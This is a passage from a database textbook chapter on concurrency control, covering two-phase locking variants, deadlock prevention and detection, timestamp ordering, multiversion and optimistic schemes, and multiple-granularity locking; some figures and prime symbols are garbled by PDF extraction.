4. A transaction T will not issue a read_lock(X) operation if it already holds a
read (shared) lock or a write (exclusive) lock on item X. This rule may be
relaxed, as we discuss shortly.

3This rule may be relaxed to allow a transaction to unlock an item, then lock it again later.

784

Concurrency Control Techniques

5. A transaction T will not issue a write_lock(X) operation if it already holds a
read (shared) lock or write (exclusive) lock on item X. This rule may also be
relaxed, as we discuss shortly.

6. A transaction T will not issue an unlock(X) operation unless it already holds
a read (shared) lock or a write (exclusive) lock on item X.

Conversion of Locks. Sometimes it is desirable to relax conditions 4 and 5 in the
preceding list in order to allow lock conversion; that is, a transaction that already
holds a lock on item X is allowed under certain conditions to convert the lock from
one locked state to another. For example, it is possible for a transaction T to issue a
read_lock(X) and then later to upgrade the lock by issuing a write_lock(X) operation.
If T is the only transaction holding a read lock on X at the time it issues the
write_lock(X) operation, the lock can be upgraded; otherwise, the transaction must
wait. It is also possible for a transaction T to issue a write_lock(X) and then later to
downgrade the lock by issuing a read_lock(X) operation. When upgrading and
downgrading of locks is used, the lock table must include transaction identifiers in
the record structure for each lock (in the locking_transaction(s) field) to store the
information on which transactions hold locks on the item. The descriptions of the
read_lock(X) and write_lock(X) operations in Figure 2 must be changed appropri-
ately to allow for lock upgrading and downgrading. We leave this as an exercise for
the reader.

Using binary locks or read/write locks in transactions, as described earlier, does not
guarantee serializability of schedules on its own. Figure 3 shows an example where
the preceding locking rules are followed but a nonserializable schedule may result.
This is because in Figure 3(a) the items Y in T1 and X in T2 were unlocked too early.
This allows a schedule such as the one shown in Figure 3(c) to occur, which is not a
serializable schedule and hence gives incorrect results. To guarantee serializability,
we must follow an additional protocol concerning the positioning of locking and
unlocking operations in every transaction. The best-known protocol, two-phase
locking, is described in the next section.

1.2 Guaranteeing Serializability by Two-Phase Locking
A transaction is said to follow the two-phase locking protocol if all locking opera-
tions (read_lock, write_lock) precede the first unlock operation in the transaction.4

Such a transaction can be divided into two phases: an expanding or growing (first)
phase, during which new locks on items can be acquired but none can be released;
and a shrinking (second) phase, during which existing locks can be released but no
new locks can be acquired. If lock conversion is allowed, then upgrading of locks
(from read-locked to write-locked) must be done during the expanding phase, and
downgrading of locks (from write-locked to read-locked) must be done in the

4This is unrelated to the two-phase commit protocol for recovery in distributed databases.

785

Concurrency Control Techniques

(a) T1 Initial values: X=20, Y=30

Result serial schedule T1
followed by T2: X=50, Y=80

Result of serial schedule T2
followed by T1: X=70, Y=50

read_lock(Y );
read_item(Y );
unlock(Y );
write_lock(X );
read_item(X );
X := X + Y;
write_item(X );
unlock(X );

write_lock(X );
read_item(X );
X := X + Y;
write_item(X );
unlock(X );

read_lock(X );
read_item(X );
unlock(X );
write_lock(Y );
read_item(Y );
Y := X + Y;
write_item(Y );
unlock(Y );

read_lock(X );
read_item(X );
unlock(X );
write_lock(Y );
read_item(Y );
Y := X + Y;
write_item(Y );
unlock(Y );

(b)

(c)

Time

read_lock(Y );
read_item(Y );
unlock(Y );

Result of schedule S:
X=50, Y=50
(nonserializable)

T2

T1 T2

Figure 3
Transactions that do not obey two-phase lock-
ing. (a) Two transactions T1 and T2. (b) Results
of possible serial schedules of T1 and T2. (c) A
nonserializable schedule S that uses locks.

shrinking phase. Hence, a read_lock(X) operation that downgrades an already held
write lock on X can appear only in the shrinking phase.

Transactions T1 and T2 in Figure 3(a) do not follow the two-phase locking protocol
because the write_lock(X) operation follows the unlock(Y) operation in T1, and simi-
larly the write_lock(Y) operation follows the unlock(X) operation in T2. If we enforce
two-phase locking, the transactions can be rewritten as T1� and T2�, as shown in
Figure 4. Now, the schedule shown in Figure 3(c) is not permitted for T1� and T2�
(with their modified order of locking and unlocking operations) under the rules of
locking described in Section 1.1 because T1� will issue its write_lock(X) before it
unlocks item Y; consequently, when T2� issues its read_lock(X), it is forced to wait
until T1� releases the lock by issuing an unlock (X) in the schedule.

786

Concurrency Control Techniques

read_lock(Y );
read_item(Y );
write_lock(X );
unlock(Y )
read_item(X );
X := X + Y;
write_item(X );
unlock(X );

read_lock(X );
read_item(X );
write_lock(Y );
unlock(X )
read_item(Y );
Y := X + Y;
write_item(Y );
unlock(Y );

T1� T2�

Figure 4
Transactions T1� and T2�, which are the
same as T1 and T2 in Figure 3, but fol-
low the two-phase locking protocol.
Note that they can produce a deadlock.

It can be proved that, if every transaction in a schedule follows the two-phase lock-
ing protocol, the schedule is guaranteed to be serializable, obviating the need to test
for serializability of schedules. The locking protocol, by enforcing two-phase lock-
ing rules, also enforces serializability.

Two-phase locking may limit the amount of concurrency that can occur in a sched-
ule because a transaction T may not be able to release an item X after it is through
using it if T must lock an additional item Y later; or conversely, T must lock the
additional item Y before it needs it so that it can release X. Hence, X must remain
locked by T until all items that the transaction needs to read or write have been
locked; only then can X be released by T. Meanwhile, another transaction seeking to
access X may be forced to wait, even though T is done with X; conversely, if Y is
locked earlier than it is needed, another transaction seeking to access Y is forced to
wait even though T is not using Y yet. This is the price for guaranteeing serializabil-
ity of all schedules without having to check the schedules themselves.

Although the two-phase locking protocol guarantees serializability (that is, every
schedule that is permitted is serializable), it does not permit all possible serializable
schedules (that is, some serializable schedules will be prohibited by the protocol).

Basic, Conservative, Strict, and Rigorous Two-Phase Locking. There are a
number of variations of two-phase locking (2PL). The technique just described is
known as basic 2PL. A variation known as conservative 2PL (or static 2PL)
requires a transaction to lock all the items it accesses before the transaction begins
execution, by predeclaring its read-set and write-set. Recall that the read-set of a
transaction is the set of all items that the transaction reads, and the write-set is the
set of all items that it writes. If any of the predeclared items needed cannot be
locked, the transaction does not lock any item; instead, it waits until all the items are
available for locking. Conservative 2PL is a deadlock-free protocol, as we will see in
Section 1.3 when we discuss the deadlock problem. However, it is difficult to use in
practice because of the need to predeclare the read-set and write-set, which is not
possible in many situations.

In practice, the most popular variation of 2PL is strict 2PL, which guarantees strict
schedules. In this variation, a transaction T does not release any of its exclusive

787

Concurrency Control Techniques

(write) locks until after it commits or aborts. Hence, no other transaction can read
or write an item that is written by T unless T has committed, leading to a strict
schedule for recoverability. Strict 2PL is not deadlock-free. A more restrictive varia-
tion of strict 2PL is rigorous 2PL, which also guarantees strict schedules. In this
variation, a transaction T does not release any of its locks (exclusive or shared) until
after it commits or aborts, and so it is easier to implement than strict 2PL. Notice
the difference between conservative and rigorous 2PL: the former must lock all its
items before it starts, so once the transaction starts it is in its shrinking phase; the lat-
ter does not unlock any of its items until after it terminates (by committing or abort-
ing), so the transaction is in its expanding phase until it ends.

In many cases, the concurrency control subsystem itself is responsible for generat-
ing the read_lock and write_lock requests. For example, suppose the system is to
enforce the strict 2PL protocol. Then, whenever transaction T issues a read_item(X),
the system calls the read_lock(X) operation on behalf of T. If the state of LOCK(X) is
write_locked by some other transaction T�, the system places T in the waiting queue
for item X; otherwise, it grants the read_lock(X) request and permits the
read_item(X) operation of T to execute. On the other hand, if transaction T issues a
write_item(X), the system calls the write_lock(X) operation on behalf of T. If the state
of LOCK(X) is write_locked or read_locked by some other transaction T�, the system
places T in the waiting queue for item X; if the state of LOCK(X) is read_locked and
T itself is the only transaction holding the read lock on X, the system upgrades the
lock to write_locked and permits the write_item(X) operation by T. Finally, if the
state of LOCK(X) is unlocked, the system grants the write_lock(X) request and per-
mits the write_item(X) operation to execute. After each action, the system must
update its lock table appropriately.

The use of locks can cause two additional problems: deadlock and starvation. We
discuss these problems and their solutions in the next section.

1.3 Dealing with Deadlock and Starvation
Deadlock occurs when each transaction T in a set of two or more transactions is
waiting for some item that is locked by some other transaction T� in the set. Hence,
each transaction in the set is in a waiting queue, waiting for one of the other trans-
actions in the set to release the lock on an item. But because the other transaction is
also waiting, it will never release the lock. A simple example is shown in Figure 5(a),
where the two transactions T1�and T2�are deadlocked in a partial schedule; T1� is in
the waiting queue for X, which is locked by T2�, while T2� is in the waiting queue for
Y, which is locked by T1�. Meanwhile, neither T1� nor T2� nor any other transaction
can access items X and Y.

Deadlock Prevention Protocols. One way to prevent deadlock is to use a
deadlock prevention protocol.5 One deadlock prevention protocol, which is used

5These protocols are not generally used in practice, either because of unrealistic assumptions or
because of their possible overhead. Deadlock detection and timeouts (covered in the following sections)
are more practical.

788

Concurrency Control Techniques

(a) T1� (b)

read_lock(Y );
read_item(Y );

Time

write_lock(X );

read_lock(X );
read_item(X );

write_lock(Y );

T2�

T2�T1�

X

Y

Figure 5
Illustrating the deadlock problem. (a) A partial schedule of T1� and T2� that is
in a state of deadlock. (b) A wait-for graph for the partial schedule in (a).

in conservative two-phase locking, requires that every transaction lock all the items
it needs in advance (which is generally not a practical assumption)—if any of the
items cannot be obtained, none of the items are locked. Rather, the transaction waits
and then tries again to lock all the items it needs. Obviously this solution further
limits concurrency. A second protocol, which also limits concurrency, involves
ordering all the items in the database and making sure that a transaction that needs
several items will lock them according to that order. This requires that the program-
mer (or the system) is aware of the chosen order of the items, which is also not prac-
tical in the database context.

A number of other deadlock prevention schemes have been proposed that make a
decision about what to do with a transaction involved in a possible deadlock situa-
tion: Should it be blocked and made to wait or should it be aborted, or should the
transaction preempt and abort another transaction? Some of these techniques use
the concept of transaction timestamp TS(T), which is a unique identifier assigned
to each transaction. The timestamps are typically based on the order in which trans-
actions are started; hence, if transaction T1 starts before transaction T2, then TS(T1)
< TS(T2). Notice that the older transaction (which starts first) has the smaller time- stamp value. Two schemes that prevent deadlock are called wait-die and wound- wait. Suppose that transaction Ti tries to lock an item X but is not able to because X is locked by some other transaction Tj with a conflicting lock. The rules followed by these schemes are: ■ Wait-die. If TS(Ti) < TS(Tj), then (Ti older than Tj) Ti is allowed to wait; otherwise (Ti younger than Tj) abort Ti (Ti dies) and restart it later with the same timestamp. ■ Wound-wait. If TS(Ti) < TS(Tj), then (Ti older than Tj) abort Tj (Ti wounds Tj) and restart it later with the same timestamp; otherwise (Ti younger than Tj) Ti is allowed to wait. In wait-die, an older transaction is allowed to wait for a younger transaction, whereas a younger transaction requesting an item held by an older transaction is aborted and restarted. The wound-wait approach does the opposite: A younger transaction is allowed to wait for an older one, whereas an older transaction requesting an item 789 Concurrency Control Techniques held by a younger transaction preempts the younger transaction by aborting it. Both schemes end up aborting the younger of the two transactions (the transaction that started later) that may be involved in a deadlock, assuming that this will waste less processing. It can be shown that these two techniques are deadlock-free, since in wait-die, transactions only wait for younger transactions so no cycle is created. Similarly, in wound-wait, transactions only wait for older transactions so no cycle is created. However, both techniques may cause some transactions to be aborted and restarted needlessly, even though those transactions may never actually cause a deadlock. Another group of protocols that prevent deadlock do not require timestamps. These include the no waiting (NW) and cautious waiting (CW) algorithms. In the no waiting algorithm, if a transaction is unable to obtain a lock, it is immediately aborted and then restarted after a certain time delay without checking whether a deadlock will actually occur or not. In this case, no transaction ever waits, so no deadlock will occur. However, this scheme can cause transactions to abort and restart needlessly. The cautious waiting algorithm was proposed to try to reduce the number of needless aborts/restarts. Suppose that transaction Ti tries to lock an item X but is not able to do so because X is locked by some other transaction Tj with a conflicting lock. The cautious waiting rules are as follows: ■ Cautious waiting. If Tj is not blocked (not waiting for some other locked item), then Ti is blocked and allowed to wait; otherwise abort Ti. It can be shown that cautious waiting is deadlock-free, because no transaction will ever wait for another blocked transaction. By considering the time b(T) at which each blocked transaction T was blocked, if the two transactions Ti and Tj above both become blocked, and Ti is waiting for Tj, then b(Ti) < b(Tj), since Ti can only wait for Tj at a time when Tj is not blocked itself. Hence, the blocking times form a total ordering on all blocked transactions, so no cycle that causes deadlock can occur. Deadlock Detection. A second, more practical approach to dealing with dead- lock is deadlock detection, where the system checks if a state of deadlock actually exists. This solution is attractive if we know there will be little interference among the transactions—that is, if different transactions will rarely access the same items at the same time. This can happen if the transactions are short and each transaction locks only a few items, or if the transaction load is light. On the other hand, if trans- actions are long and each transaction uses many items, or if the transaction load is quite heavy, it may be advantageous to use a deadlock prevention scheme. A simple way to detect a state of deadlock is for the system to construct and main- tain a wait-for graph. One node is created in the wait-for graph for each transaction that is currently executing. Whenever a transaction Ti is waiting to lock an item X that is currently locked by a transaction Tj, a directed edge (Ti → Tj) is created in the wait-for graph. When Tj releases the lock(s) on the items that Ti was waiting for, the directed edge is dropped from the wait-for graph. We have a state of dead- lock if and only if the wait-for graph has a cycle. One problem with this approach is the matter of determining when the system should check for a deadlock. One possi- 790 Concurrency Control Techniques bility is to check for a cycle every time an edge is added to the wait-for graph, but this may cause excessive overhead. Criteria such as the number of currently execut- ing transactions or the period of time several transactions have been waiting to lock items may be used instead to check for a cycle. Figure 5(b) shows the wait-for graph for the (partial) schedule shown in Figure 5(a). If the system is in a state of deadlock, some of the transactions causing the deadlock must be aborted. Choosing which transactions to abort is known as victim selec- tion. The algorithm for victim selection should generally avoid selecting transac- tions that have been running for a long time and that have performed many updates, and it should try instead to select transactions that have not made many changes (younger transactions). Timeouts. Another simple scheme to deal with deadlock is the use of timeouts. This method is practical because of its low overhead and simplicity. In this method, if a transaction waits for a period longer than a system-defined timeout period, the system assumes that the transaction may be deadlocked and aborts it—regardless of whether a deadlock actually exists or not. Starvation. Another problem that may occur when we use locking is starvation, which occurs when a transaction cannot proceed for an indefinite period of time while other transactions in the system continue normally. This may occur if the waiting scheme for locked items is unfair, giving priority to some transactions over others. One solution for starvation is to have a fair waiting scheme, such as using a first-come-first-served queue; transactions are enabled to lock an item in the order in which they originally requested the lock. Another scheme allows some transac- tions to have priority over others but increases the priority of a transaction the longer it waits, until it eventually gets the highest priority and proceeds. Starvation can also occur because of victim selection if the algorithm selects the same transac- tion as victim repeatedly, thus causing it to abort and never finish execution. The algorithm can use higher priorities for transactions that have been aborted multiple times to avoid this problem. The wait-die and wound-wait schemes discussed previ- ously avoid starvation, because they restart a transaction that has been aborted with its same original timestamp, so the possibility that the same transaction is aborted repeatedly is slim. 2 Concurrency Control Based on Timestamp Ordering The use of locks, combined with the 2PL protocol, guarantees serializability of schedules. The serializable schedules produced by 2PL have their equivalent serial schedules based on the order in which executing transactions lock the items they acquire. If a transaction needs an item that is already locked, it may be forced to wait until the item is released. Some transactions may be aborted and restarted because of the deadlock problem. A different approach that guarantees serializability involves using transaction timestamps to order transaction execution for an equiva- 791 Concurrency Control Techniques lent serial schedule. In Section 2.1 we discuss timestamps, and in Section 2.2 we dis- cuss how serializability is enforced by ordering transactions based on their time- stamps. 2.1 Timestamps Recall that a timestamp is a unique identifier created by the DBMS to identify a transaction. Typically, timestamp values are assigned in the order in which the transactions are submitted to the system, so a timestamp can be thought of as the transaction start time. We will refer to the timestamp of transaction T as TS(T). Concurrency control techniques based on timestamp ordering do not use locks; hence, deadlocks cannot occur. Timestamps can be generated in several ways. One possibility is to use a counter that is incremented each time its value is assigned to a transaction. The transaction time- stamps are numbered 1, 2, 3, ... in this scheme. A computer counter has a finite max- imum value, so the system must periodically reset the counter to zero when no transactions are executing for some short period of time. Another way to implement timestamps is to use the current date/time value of the system clock and ensure that no two timestamp values are generated during the same tick of the clock. 2.2 The Timestamp Ordering Algorithm The idea for this scheme is to order the transactions based on their timestamps. A schedule in which the transactions participate is then serializable, and the only equivalent serial schedule permitted has the transactions in order of their timestamp values. This is called timestamp ordering (TO). Notice how this differs from 2PL, where a schedule is serializable by being equivalent to some serial schedule allowed by the locking protocols. In timestamp ordering, however, the schedule is equivalent to the particular serial order corresponding to the order of the transaction time- stamps. The algorithm must ensure that, for each item accessed by conflicting opera- tions in the schedule, the order in which the item is accessed does not violate the timestamp order. To do this, the algorithm associates with each database item X two timestamp (TS) values: 1. read_TS(X). The read timestamp of item X is the largest timestamp among all the timestamps of transactions that have successfully read item X—that is, read_TS(X) = TS(T), where T is the youngest transaction that has read X successfully. 2. write_TS(X). The write timestamp of item X is the largest of all the time- stamps of transactions that have successfully written item X—that is, write_TS(X) = TS(T), where T is the youngest transaction that has written X successfully. Basic Timestamp Ordering (TO). Whenever some transaction T tries to issue a read_item(X) or a write_item(X) operation, the basic TO algorithm compares the timestamp of T with read_TS(X) and write_TS(X) to ensure that the timestamp 792 Concurrency Control Techniques order of transaction execution is not violated. If this order is violated, then transac- tion T is aborted and resubmitted to the system as a new transaction with a new timestamp. If T is aborted and rolled back, any transaction T1 that may have used a value written by T must also be rolled back. Similarly, any transaction T2 that may have used a value written by T1 must also be rolled back, and so on. This effect is known as cascading rollback and is one of the problems associated with basic TO, since the schedules produced are not guaranteed to be recoverable. An additional protocol must be enforced to ensure that the schedules are recoverable, cascadeless, or strict. We first describe the basic TO algorithm here. The concurrency control algorithm must check whether conflicting operations violate the timestamp order- ing in the following two cases: 1. Whenever a transaction T issues a write_item(X) operation, the following is checked: a. If read_TS(X) > TS(T) or if write_TS(X) > TS(T), then abort and roll back
T and reject the operation. This should be done because some younger
transaction with a timestamp greater than TS(T)—and hence after T in
the timestamp ordering—has already read or written the value of item X
before T had a chance to write X, thus violating the timestamp ordering.

b. If the condition in part (a) does not occur, then execute the write_item(X)
operation of T and set write_TS(X) to TS(T).

2. Whenever a transaction T issues a read_item(X) operation, the following is
checked:

a. If write_TS(X) > TS(T), then abort and roll back T and reject the opera-
tion. This should be done because some younger transaction with time-
stamp greater than TS(T)—and hence after T in the timestamp
ordering—has already written the value of item X before T had a chance
to read X.

b. If write_TS(X) ≤ TS(T), then execute the read_item(X) operation of T and
set read_TS(X) to the larger of TS(T) and the current read_TS(X).

Whenever the basic TO algorithm detects two conflicting operations that occur in the
incorrect order, it rejects the later of the two operations by aborting the transaction
that issued it. The schedules produced by basic TO are hence guaranteed to be
conflict serializable, like the 2PL protocol. However, some schedules are possible
under each protocol that are not allowed under the other. Thus, neither protocol
allows all possible serializable schedules. As mentioned earlier, deadlock does not
occur with timestamp ordering. However, cyclic restart (and hence starvation) may
occur if a transaction is continually aborted and restarted.

Strict Timestamp Ordering (TO). A variation of basic TO called strict TO
ensures that the schedules are both strict (for easy recoverability) and (conflict)
serializable. In this variation, a transaction T that issues a read_item(X) or
write_item(X) such that TS(T) > write_TS(X) has its read or write operation delayed
until the transaction T� that wrote the value of X (hence TS(T�) = write_TS(X)) has
committed or aborted. To implement this algorithm, it is necessary to simulate the

793

Concurrency Control Techniques

locking of an item X that has been written by transaction T� until T� is either com-
mitted or aborted. This algorithm does not cause deadlock, since T waits for T� only
if TS(T) > TS(T�).

Thomas’s Write Rule. A modification of the basic TO algorithm, known as
Thomas’s write rule, does not enforce conflict serializability, but it rejects fewer
write operations by modifying the checks for the write_item(X) operation as
follows:

1. If read_TS(X) > TS(T), then abort and roll back T and reject the operation.

2. If write_TS(X) > TS(T), then do not execute the write operation but continue
processing. This is because some transaction with timestamp greater than
TS(T)—and hence after T in the timestamp ordering—has already written
the value of X. Thus, we must ignore the write_item(X) operation of T
because it is already outdated and obsolete. Notice that any conflict arising
from this situation would be detected by case (1).

3. If neither the condition in part (1) nor the condition in part (2) occurs, then
execute the write_item(X) operation of T and set write_TS(X) to TS(T).

3 Multiversion Concurrency
Control Techniques

Other protocols for concurrency control keep the old values of a data item when the
item is updated. These are known as multiversion concurrency control, because
several versions (values) of an item are maintained. When a transaction requires
access to an item, an appropriate version is chosen to maintain the serializability of
the currently executing schedule, if possible. The idea is that some read operations
that would be rejected in other techniques can still be accepted by reading an older
version of the item to maintain serializability. When a transaction writes an item, it
writes a new version and the old version(s) of the item are retained. Some multiver-
sion concurrency control algorithms use the concept of view serializability rather
than conflict serializability.

An obvious drawback of multiversion techniques is that more storage is needed to
maintain multiple versions of the database items. However, older versions may have
to be maintained anyway—for example, for recovery purposes. In addition, some
database applications require older versions to be kept to maintain a history of the
evolution of data item values. The extreme case is a temporal database, which keeps
track of all changes and the times at which they occurred. In such cases, there is no
additional storage penalty for multiversion techniques, since older versions are
already maintained.

Several multiversion concurrency control schemes have been proposed. We discuss
two schemes here, one based on timestamp ordering and the other based on 2PL. In
addition, the validation concurrency control method (see Section 4) also maintains
multiple versions.

794

Concurrency Control Techniques

3.1 Multiversion Technique Based on Timestamp Ordering
In this method, several versions X1, X2, …, Xk of each data item X are maintained.
For each version, the value of version Xi and the following two timestamps are kept:

1. read_TS(Xi). The read timestamp of Xi is the largest of all the timestamps of
transactions that have successfully read version Xi.

2. write_TS(Xi). The write timestamp of Xi is the timestamp of the transac-
tion that wrote the value of version Xi.

Whenever a transaction T is allowed to execute a write_item(X) operation, a new ver-
sion Xk+1 of item X is created, with both the write_TS(Xk+1) and the read_TS(Xk+1)
set to TS(T). Correspondingly, when a transaction T is allowed to read the value of
version Xi, the value of read_TS(Xi) is set to the larger of the current read_TS(Xi) and
TS(T).

To ensure serializability, the following rules are used:

1. If transaction T issues a write_item(X) operation, and version i of X has the
highest write_TS(Xi) of all versions of X that is also less than or equal to TS(T),
and read_TS(Xi) > TS(T), then abort and roll back transaction T; otherwise,
create a new version Xj of X with read_TS(Xj) = write_TS(Xj) = TS(T).

2. If transaction T issues a read_item(X) operation, find the version i of X that
has the highest write_TS(Xi) of all versions of X that is also less than or equal
to TS(T); then return the value of Xi to transaction T, and set the value of
read_TS(Xi) to the larger of TS(T) and the current read_TS(Xi).

As we can see in case 2, a read_item(X) is always successful, since it finds the appro-
priate version Xi to read based on the write_TS of the various existing versions of X.
In case 1, however, transaction T may be aborted and rolled back. This happens if T
attempts to write a version of X that should have been read by another transaction
T� whose timestamp is read_TS(Xi); however, T� has already read version Xi, which
was written by the transaction with timestamp equal to write_TS(Xi). If this conflict
occurs, T is rolled back; otherwise, a new version of X, written by transaction T, is
created. Notice that if T is rolled back, cascading rollback may occur. Hence, to
ensure recoverability, a transaction T should not be allowed to commit until after all
the transactions that have written some version that T has read have committed.

3.2 Multiversion Two-Phase Locking Using Certify Locks
In this multiple-mode locking scheme, there are three locking modes for an item:
read, write, and certify, instead of just the two modes (read, write) discussed previ-
ously. Hence, the state of LOCK(X) for an item X can be one of read-locked, write-
locked, certify-locked, or unlocked. In the standard locking scheme, with only read
and write locks (see Section 1.1), a write lock is an exclusive lock. We can describe
the relationship between read and write locks in the standard scheme by means of
the lock compatibility table shown in Figure 6(a). An entry of Yes means that if a
transaction T holds the type of lock specified in the column header on item X and if

795

Concurrency Control Techniques

(b) Read Write

Read

Write

Certify

Yes No No

No No No

Yes Yes No

Certify

(a) Read Write

Read

Write No No

Yes No

Figure 6
Lock compatibility tables.
(a) A compatibility table for
read/write locking scheme.
(b) A compatibility table for
read/write/certify locking
scheme.

transaction T�requests the type of lock specified in the row header on the same item
X, then T� can obtain the lock because the locking modes are compatible. On the
other hand, an entry of No in the table indicates that the locks are not compatible,
so T� must wait until T releases the lock.

In the standard locking scheme, once a transaction obtains a write lock on an item,
no other transactions can access that item. The idea behind multiversion 2PL is to
allow other transactions T� to read an item X while a single transaction T holds a
write lock on X. This is accomplished by allowing two versions for each item X; one
version must always have been written by some committed transaction. The second
version X� is created when a transaction T acquires a write lock on the item. Other
transactions can continue to read the committed version of X while T holds the write
lock. Transaction T can write the value of X� as needed, without affecting the value
of the committed version X. However, once T is ready to commit, it must obtain a
certify lock on all items that it currently holds write locks on before it can commit.
The certify lock is not compatible with read locks, so the transaction may have to
delay its commit until all its write-locked items are released by any reading transac-
tions in order to obtain the certify locks. Once the certify locks—which are exclusive
locks—are acquired, the committed version X of the data item is set to the value of
version X�, version X� is discarded, and the certify locks are then released. The lock
compatibility table for this scheme is shown in Figure 6(b).

In this multiversion 2PL scheme, reads can proceed concurrently with a single write
operation—an arrangement not permitted under the standard 2PL schemes. The
cost is that a transaction may have to delay its commit until it obtains exclusive cer-
tify locks on all the items it has updated. It can be shown that this scheme avoids cas-
cading aborts, since transactions are only allowed to read the version X that was
written by a committed transaction. However, deadlocks may occur if upgrading of
a read lock to a write lock is allowed, and these must be handled by variations of the
techniques discussed in Section 1.3.

796

Concurrency Control Techniques

4 Validation (Optimistic) Concurrency Control
Techniques

In all the concurrency control techniques we have discussed so far, a certain degree
of checking is done before a database operation can be executed. For example, in
locking, a check is done to determine whether the item being accessed is locked. In
timestamp ordering, the transaction timestamp is checked against the read and
write timestamps of the item. Such checking represents overhead during transac-
tion execution, with the effect of slowing down the transactions.

In optimistic concurrency control techniques, also known as validation or
certification techniques, no checking is done while the transaction is executing.
Several theoretical concurrency control methods are based on the validation tech-
nique. We will describe only one scheme here. In this scheme, updates in the trans-
action are not applied directly to the database items until the transaction reaches its
end. During transaction execution, all updates are applied to local copies of the data
items that are kept for the transaction.6 At the end of transaction execution, a
validation phase checks whether any of the transaction’s updates violate serializ-
ability. Certain information needed by the validation phase must be kept by the sys-
tem. If serializability is not violated, the transaction is committed and the database
is updated from the local copies; otherwise, the transaction is aborted and then
restarted later.

There are three phases for this concurrency control protocol:

1. Read phase. A transaction can read values of committed data items from the
database. However, updates are applied only to local copies (versions) of the
data items kept in the transaction workspace.

2. Validation phase. Checking is performed to ensure that serializability will
not be violated if the transaction updates are applied to the database.

3. Write phase. If the validation phase is successful, the transaction updates are
applied to the database; otherwise, the updates are discarded and the trans-
action is restarted.

The idea behind optimistic concurrency control is to do all the checks at once;
hence, transaction execution proceeds with a minimum of overhead until the vali-
dation phase is reached. If there is little interference among transactions, most will
be validated successfully. However, if there is much interference, many transactions
that execute to completion will have their results discarded and must be restarted
later. Under these circumstances, optimistic techniques do not work well. The tech-
niques are called optimistic because they assume that little interference will occur
and hence that there is no need to do checking during transaction execution.

The optimistic protocol we describe uses transaction timestamps and also requires
that the write_sets and read_sets of the transactions be kept by the system.
Additionally, start and end times for some of the three phases need to be kept for

6Note that this can be considered as keeping multiple versions of items!

797

Concurrency Control Techniques

each transaction. Recall that the write_set of a transaction is the set of items it writes,
and the read_set is the set of items it reads. In the validation phase for transaction Ti,
the protocol checks that Ti does not interfere with any committed transactions or
with any other transactions currently in their validation phase. The validation phase
for Ti checks that, for each such transaction Tj that is either committed or is in its
validation phase, one of the following conditions holds:

1. Transaction Tj completes its write phase before Ti starts its read phase.

2. Ti starts its write phase after Tj completes its write phase, and the read_set
of Ti has no items in common with the write_set of Tj.

3. Both the read_set and write_set of Ti have no items in common with the
write_set of Tj, and Tj completes its read phase before Ti completes its read
phase.

When validating transaction Ti, the first condition is checked first for each transac-
tion Tj, since (1) is the simplest condition to check. Only if condition 1 is false is
condition 2 checked, and only if (2) is false is condition 3—the most complex to
evaluate—checked. If any one of these three conditions holds, there is no interfer-
ence and Ti is validated successfully. If none of these three conditions holds, the val-
idation of transaction Ti fails and it is aborted and restarted later because
interference may have occurred.

5 Granularity of Data Items and Multiple
Granularity Locking

All concurrency control techniques assume that the database is formed of a number
of named data items. A database item could be chosen to be one of the following:

■ A database record

■ A field value of a database record

■ A disk block

■ A whole file

■ The whole database

The granularity can affect the performance of concurrency control and recovery. In
Section 5.1, we discuss some of the tradeoffs with regard to choosing the granular-
ity level used for locking, and in Section 5.2 we discuss a multiple granularity lock-
ing scheme, where the granularity level (size of the data item) may be changed
dynamically.

5.1 Granularity Level Considerations for Locking
The size of data items is often called the data item granularity. Fine granularity
refers to small item sizes, whereas coarse granularity refers to large item sizes. Several
tradeoffs must be considered in choosing the data item size. We will discuss data
item size in the context of locking, although similar arguments can be made for
other concurrency control techniques.

798

Concurrency Control Techniques

db

r111 r11j r121 r12j r1n1 r1nj r211 r21k r221 r22k r2m1 r2mk. . . . . . . . .

. . .

. . . . . . . . . . . .

. . .

. . .

p11 p12

f1

p1n p21 p22 p2m

f2

Figure 7
A granularity hierarchy
for illustrating multiple
granularity level
locking.

First, notice that the larger the data item size is, the lower the degree of concurrency
permitted. For example, if the data item size is a disk block, a transaction T that
needs to lock a record B must lock the whole disk block X that contains B because a
lock is associated with the whole data item (block). Now, if another transaction S
wants to lock a different record C that happens to reside in the same block X in a
conflicting lock mode, it is forced to wait. If the data item size was a single record,
transaction S would be able to proceed, because it would be locking a different data
item (record).

On the other hand, the smaller the data item size is, the more the number of items
in the database. Because every item is associated with a lock, the system will have a
larger number of active locks to be handled by the lock manager. More lock and
unlock operations will be performed, causing a higher overhead. In addition, more
storage space will be required for the lock table. For timestamps, storage is required
for the read_TS and write_TS for each data item, and there will be similar overhead
for handling a large number of items.

Given the above tradeoffs, an obvious question can be asked: What is the best item
size? The answer is that it depends on the types of transactions involved. If a typical
transaction accesses a small number of records, it is advantageous to have the data
item granularity be one record. On the other hand, if a transaction typically accesses
many records in the same file, it may be better to have block or file granularity so
that the transaction will consider all those records as one (or a few) data items.

5.2 Multiple Granularity Level Locking
Since the best granularity size depends on the given transaction, it seems appropri-
ate that a database system should support multiple levels of granularity, where the
granularity level can be different for various mixes of transactions. Figure 7 shows a
simple granularity hierarchy with a database containing two files, each file contain-
ing several disk pages, and each page containing several records. This can be used to
illustrate a multiple granularity level 2PL protocol, where a lock can be requested
at any level. However, additional types of locks will be needed to support such a pro-
tocol efficiently.

799

Concurrency Control Techniques

Consider the following scenario, with only shared and exclusive lock types, that refers
to the example in Figure 7. Suppose transaction T1 wants to update all the records in
file f1, and T1 requests and is granted an exclusive lock for f1. Then all of f1’s pages (p11
through p1n)—and the records contained on those pages—are locked in exclusive
mode. This is beneficial for T1 because setting a single file-level lock is more efficient
than setting n page-level locks or having to lock each individual record. Now suppose
another transaction T2 only wants to read record r1nj from page p1n of file f1; then T2
would request a shared record-level lock on r1nj. However, the database system (that
is, the transaction manager or more specifically the lock manager) must verify the
compatibility of the requested lock with already held locks. One way to verify this is
to traverse the tree from the leaf r1nj to p1n to f1 to db. If at any time a conflicting lock
is held on any of those items, then the lock request for r1nj is denied and T2 is blocked
and must wait. This traversal would be fairly efficient.

However, what if transaction T2’s request came before transaction T1’s request? In
this case, the shared record lock is granted to T2 for r1nj, but when T1’s file-level lock
is requested, it is quite difficult for the lock manager to check all nodes (pages and
records) that are descendants of node f1 for a lock conflict. This would be very inef-
ficient and would defeat the purpose of having multiple granularity level locks.

To make multiple granularity level locking practical, additional types of locks, called
intention locks, are needed. The idea behind intention locks is for a transaction to
indicate, along the path from the root to the desired node, what type of lock (shared
